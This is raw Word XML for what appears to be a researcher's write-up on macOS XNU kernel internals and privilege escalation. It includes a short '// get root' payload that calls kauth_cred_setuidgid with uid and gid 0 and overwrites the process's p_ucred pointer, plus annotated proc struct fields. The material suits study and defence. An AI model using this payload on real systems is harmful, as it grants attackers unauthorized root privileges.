    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758080:     (auditinfo_addr_t *) as_aia_p = 0xffffff800d8fa718</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758088:     (au_mask_t) as_mask = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758088:       (unsigned int) am_success = 12288</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a75808c:       (unsigned int) am_failure = 12288</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C0777" w:rsidRPr="0032166C" w:rsidRDefault="003C0777" w:rsidP="0032166C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:t>To escalate the privileges of the identity owning the process, the cr_uid field, which is located at offset 0x0c, can be set to 0. The offset is 0x0c</w:t>
      </w:r>
      <w:r w:rsidR="0032166C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0032166C">
        <w:t xml:space="preserve">and not 0x08 as you might expect, because a TAILQ_ENTRY is eight bytes wide. Of course, the other elements can also be </w:t>
      </w:r>
      <w:r w:rsidR="0032166C">
        <w:lastRenderedPageBreak/>
        <w:t>patched. However, once</w:t>
      </w:r>
      <w:r w:rsidR="0032166C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0032166C">
        <w:t>the uid is set to zero the userspace process can use system calls to change its permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C0777" w:rsidRDefault="003C0777" w:rsidP="003C0777">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.2.2. </w:t>
      </w:r>
      <w:r>
        <w:t>kauth_cred_setuidgid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4F29" w:rsidRPr="00DF4F29" w:rsidRDefault="00DF4F29" w:rsidP="00DF4F29">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF4F29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4F29">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kauth_cred_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proc_ucred</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4F29">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4F29">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proc_t p</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4F29">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4F29">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4F29">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4F29">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4F29">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4F29">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p_ucred</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4F29">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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uint64_t find_ucred_offset(){</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uint64_t offsets[0x80];</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for (int i = 0; i &lt; 0x80; i++){</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offsets[i] = i*8;</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 xml:space="preserve">  return proc_ucred(offsets);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF4F29" w:rsidRPr="00DF4F29" w:rsidRDefault="00DF4F29" w:rsidP="00DF4F29">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF4F29">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00132BFE" w:rsidRDefault="00132BFE" w:rsidP="00132BFE">
      <w:r>
        <w:t>// get root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00132BFE" w:rsidRDefault="00132BFE" w:rsidP="00132BFE">
      <w:r>
        <w:t xml:space="preserve">  uint64_t ucred_offset = find_ucred_offset();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00132BFE" w:rsidRDefault="00132BFE" w:rsidP="00132BFE">
      <w:r>
        <w:t xml:space="preserve">  void* old_cred = kauth_cred_get();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00132BFE" w:rsidRDefault="00132BFE" w:rsidP="00132BFE">
      <w:r>
        <w:t xml:space="preserve">  void* new_cred = kauth_cred_setuidgid(old_cred, 0, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00132BFE" w:rsidRDefault="00132BFE" w:rsidP="00132BFE">
      <w:r>
        <w:t xml:space="preserve">  uint8_t* proc = current_proc();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00132BFE" w:rsidRDefault="00132BFE" w:rsidP="00132BFE">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00805F86">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>*((void**)(proc+ucred_offset)) = new_cred</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00132BFE" w:rsidRPr="00205331" w:rsidRDefault="00132BFE" w:rsidP="00132BFE">
      <w:r>
        <w:t xml:space="preserve">  thread_exception_return();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00220FEC" w:rsidRDefault="00220FEC" w:rsidP="00220FEC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc445313237"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="00132BFE" w:rsidRPr="00132BFE" w:rsidRDefault="00132BFE" w:rsidP="00A825FA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc445313238"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="00220FEC" w:rsidRPr="00FA2766" w:rsidRDefault="00FA2766" w:rsidP="009F6926">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA2766">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\bsd\sys\proc_internal.h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA2766" w:rsidRDefault="00FA2766" w:rsidP="009F6926"/>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Description of a process.</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This structure contains the information needed to manage a thread of</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control, known in UN*X as a process; it has references to substructures</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containing descriptions of things that the process uses, but may share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00220FEC" w:rsidRPr="00220FEC" w:rsidRDefault="00220FEC" w:rsidP="00220FEC">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * with related processes.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The process structure and the substructures</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b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * are always addressible except for those marked "(PROC ONLY)" below</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>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which might be addressible only on a processor on which the process</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is running.</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xml:space="preserv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roc </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of all processe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p_p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identifier. (static)*/</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FA2766">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2766">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>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rresponding task (static)*/</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roc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pptr</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ointer to parent process.(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p_pp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s parent pid number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p_pgrp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group id of the process (LL)*/</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d_t       p_u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gid_t       p_g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d_t       p_ru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gid_t       p_rg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uid_t       p_svu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gid_t       p_svgid</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unique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unique ID - incremented on fork/spawn/vfork, remains same across exe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punique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arent's unique ID - set on fork/spawn/vfork, doesn't change if reparente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ck_mtx_t   p_mlo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mutex lock for pro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sta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 process status. (PL)*/</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shutdownstate</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kdebu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_KDEBUG eq (CC)*/</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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btrac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_BTRACE eq (CC)*/</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pg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of processes in pgrp.(PG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siblin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of sibling processes. (LL)*/</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H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children</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ointer to list of children. (LL)*/</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AILQ_H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color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uthr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uth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of uthreads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hash</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Hash chain. (LL)*/</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AILQ_H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eventqel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ev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ck_mtx_t   p_fdmlo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 lock to protect fdes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ubstructure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kauth_cred_t    </w:t>
      </w:r>
      <w:r w:rsidRPr="00805F86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p_ucre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owner's identity.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w:t>
      </w:r>
      <w:r w:rsidRPr="000A4450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">filedesc </w:t>
      </w:r>
      <w:r w:rsidRPr="000A4450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="000A4450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p_f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tr to open files structure. (PFD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stats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stat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counting/statistics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limit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limi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limits.(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sigacts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sigact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ignal actions, state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sig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ignals captured back from thread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ck_spin_t  p_slo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pin lock for itimer/profil protectio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define</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> p_rlimit    p_limit</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pl_rlimi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limit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olimi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old process limits  - not inherited by child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fla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_* flags. (atomic bit op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lfla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ocal flags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listfla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flags (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ladvfla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ocal adv flags (atomi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refcou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mber of outstanding users(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childrenc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hildren holding ref on parent (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parentref</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hildren lookup ref on parent (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p_opp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ave parent pid during ptrace. XXX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p_xsta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Exit status for wait; also stop signa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def</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> _PROC_HAS_SCHEDINFO_</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w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* may need cleanup, not use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p_estcpu</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Time averaged value of p_cpticks.(used by aio and proc_comapr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fixpt_t     p_pctcpu</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pu for this process during p_swtime (used by aio)*/</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p_slptim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used by proc_compar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_PROC_HAS_SCHEDINFO_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itimerval p_realtimer</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larm timer. (PS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timeval p_rtim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Real time.(PS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itimerval p_vtimer_user</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Virtual timers.(PS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itimerval p_vtimer_prof</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S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timeval p_rlim_cpu</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Remaining rlim cpu value.(PS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debugger</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 1: can exec set-bit programs if suser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boolean_t   sigwai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indication to suspend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sigwait_thr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thread' holding sigwait(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exit_thr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Which thread is exiting(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vforkc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mber of outstanding vforks(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vforkac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tivation running this vfork proc)(stati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fpdrainwai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FD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p_con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ast PID to send us a SIGCON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Following fields are info from SIGCHLD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pid_t   si_p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si_statu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u_int   si_cod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d_t   si_ui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color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vm_shm</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YSV SHM Lock) for sysV shared memory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CONFIG_DTRACE</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p_dtrace_argv</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write once, read only after that)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p_dtrace_envp</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write once, read only after that)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ck_mtx_t           p_dtrace_sprlo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un proc lock emulatio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dtrace_probe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are there probes for this pro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p_dtrace_cou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prlock) number of DTrace tracepoint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8_t                         p_dtrace_stop</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indicates a DTrace-desired stop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dtrace_ptss_pag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dtrace_ptss_page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prlock) list of user ptss page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dtrace_ptss_page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dtrace_ptss_free_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tomic) list of individual ptss entrie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dtrace_helper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dtrace_helper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dtrace_lock) DTrace per-proc privat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dof_ioctl_data</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dtrace_lazy_dof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prlock) unloaded dof_helper_t'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NFIG_DTRAC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XXXXXXXXXXXXX BCOPY'ed on fork XXXXXXXXXXXXXXXX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The following fields are all copied upon creation in fork.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define</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> p_startcopy p_argslen</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int   p_argslen</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ength of process argument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arg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aved argc for sysctl_procarg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user_addr_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00F64136">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user_sta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where user stack was allocate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vnod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textvp</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Vnode of executabl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off_t   p_textoff</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offset in executable vnod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sigset_t p_sigmas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DEPRECATE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sigset_t p_sigignor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ignals being ignored.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sigset_t p_sigcatch</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ignals being caught by user.(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char  p_priorit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 Process priority.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char  p_resv0</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 User-priority based on p_cpu and p_nic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nic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ocess "nice" value.(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_char  p_resv1</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NU) User-priority based on p_cpu and p_nic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CONFIG_MACF</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mac_enforc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MAC policy enforcement contro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w:t>
      </w:r>
      <w:r w:rsidRPr="00660132">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p_comm</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MAXCOMLEN</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1</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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    p_name</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2</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MAXCOMLEN</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1</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pgrp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pgrp</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ointer to process group. (L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csflags</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flags for codesign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pcaction</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tion  for process control on starvatio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8_t p_uuid</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16</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from LC_UUID load comman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xml:space="preserve">/* </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CPU type and subtype of binary slice executed in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00220FEC" w:rsidRPr="00220FEC" w:rsidRDefault="00220FEC" w:rsidP="00220FEC">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     * this process.  Protected by proc lock.</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xml:space="preserv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cpu_type_t  p_cputype</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cpu_subtype_t   p_cpusubtype</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End area that is copied on creatio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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* XXXXXXXXXXXXX End of BCOPY'ed on fork (AIOLOCK)XXXXXXXXXXXXXXXX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define</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> p_endcopy   p_aio_total_coun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aio_total_cou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ll allocated AIO requests for this pro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aio_active_cou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ll unfinished AIO requests for this pro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AILQ_H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aio_workq_entry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aio_activeq</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tive async IO request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AILQ_H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aio_workq_entry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aio_doneq</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mpleted async IO request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klist p_k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knote list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rusage_superset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_ru</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Exit information. (PL)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sigwaitcnt</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hread_t    p_signalholder</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hread_t    p_transholder</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DEPRECATE following fiel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u_short p_acfla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counting flag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latile</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> u_short p_vfs_iopolic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VFS iopolicy flags. (atomic bit op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lctx </w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2766">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p_lctx</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ointer to login context.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IST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lc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ist of processes in lctx.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w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> p_threadstar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thread start f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p_wqthread</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thread workqueue f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pthsiz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thread siz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pth_tsd_offse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offset from pthread_t to TSD for new thread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p_targcon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target concurrency ptr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ser_addr_t p_stack_addr_hi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tack allocation hint for wq thread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wqptr</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workq ptr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wqsiz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llocated siz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boolean_t       p_wqiniting</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emaphore to serialze wq_ope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lck_spin_t  p_wqlock</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lock to protect work queu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timeval p_star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tarting tim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rcall</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ractive</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idversion</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version of process identity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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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pthhash</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thread waitqueue hash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latile</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> uint64_t was_throttled __attribute__</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aligned</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8</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unter for number of throttled I/O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volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> uint64_t did_throttle __attribute__</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aligned</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8</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unter for number of I/Os this proc throttled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lastRenderedPageBreak/>
        <w:t>#if</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
